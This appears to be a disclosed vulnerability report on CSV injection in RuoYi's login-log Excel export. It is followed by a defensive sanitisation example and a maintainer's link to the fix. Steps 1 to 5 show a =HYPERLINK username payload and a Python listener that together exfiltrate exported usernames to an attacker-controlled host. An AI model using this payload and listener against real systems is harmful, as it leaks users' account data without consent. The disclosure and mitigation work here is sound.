The product has a CSV injection vulnerability. For example, the CSV injection vulnerability is used to obtain login accounts.
1. When a user logs in, in the "/login" request, change the value of username to =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") using the Burp Suite tool.
2. Run the following Python script to start an HTTP service on port 8007.
```python
from http.server import HTTPServer, BaseHTTPRequestHandler
import json

data = {'result': 'this is a test'}
# You can change **localhost** to the IP address of the hacker's computer.
host = ('localhost', 8007)


class Request(BaseHTTPRequestHandler):
    # Every GET (including the HYPERLINK callback carrying the ?u= query) is
    # logged to the console by BaseHTTPRequestHandler and answered with JSON.
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())


if __name__ == '__main__':
    server = HTTPServer(host, Request)
    print("Starting server, listen at: %s:%s" % host)
    server.serve_forever()
```
3. Choose "日志管理"->"登录日志" ("Log Management"->"Login Log") to view the logs, and export the .xlsx log file.
4. Open the .xlsx log file and double-click the cell containing =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell, and then click the =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") cell again. In this case, a request is sent to localhost:8007. The contents of cells B2 and B3 are "admin" and "test1".
[Screenshot: before double-click.]
[Screenshot: after double-click, and then clicking E.]
A request is sent to localhost:8007 through the browser.
5. The HTTP service on port 8007 receives the following information:
127.0.0.1 - - [18/Jan/2022 17:04:07] "GET /?u=admintest1 HTTP/1.1" 200 -
So we get the users "admin"/"test1"/...
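As an added defender-side example (not code from this report or from RuoYi), the export-side mitigation the fix commit describes: detect cell text that a spreadsheet would evaluate, store it as a literal before writing the login log, and flag rows that carry such text. The sample log rows, column names and the leading-apostrophe approach are assumptions for illustration.

```python
import csv
import io
from urllib.parse import unquote

# Leading characters that make Excel/LibreOffice parse a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample: login-log rows as the report describes them, with the
# injected username as it arrives once the URL-encoded login request is decoded.
INJECTED_USERNAME = unquote('=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")')
LOGIN_LOG = [
    ("admin", "127.0.0.1", "success"),
    ("test1", "127.0.0.1", "success"),
    (INJECTED_USERNAME, "127.0.0.1", "failure"),
]


def is_formula_like(value: str) -> bool:
    """Detect cell text a spreadsheet would evaluate on open or on double-click.
    Leading spaces are skipped because Excel trims them before looking for '='."""
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Store formula-like text as a literal: a leading apostrophe tells the
    spreadsheet to keep the cell as a string, and embedded tab/CR/LF are escaped
    so they cannot break out of the cell into a fresh one."""
    if is_formula_like(value):
        value = "'" + value
    return value.replace("\t", "\\t").replace("\r", "\\r").replace("\n", "\\n")


def export_login_log(rows) -> str:
    """Write the log as CSV with every cell sanitised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["username", "ip", "status"])
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


def flag_suspicious_rows(rows):
    """Detection side: indices of rows whose cells look like formulas, so the
    injected login attempt can be alerted on before anyone exports the log."""
    return [i for i, row in enumerate(rows)
            if any(is_formula_like(str(cell)) for cell in row)]
```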
@sanlang Fixed; you can update your code.
Mask formulas when exporting to Excel to prevent the CSV injection risk
https://gitee.com/y_project/RuoYi/commit/e9ebf86ac8a53bfc8475c7efad6f63a593eaefa9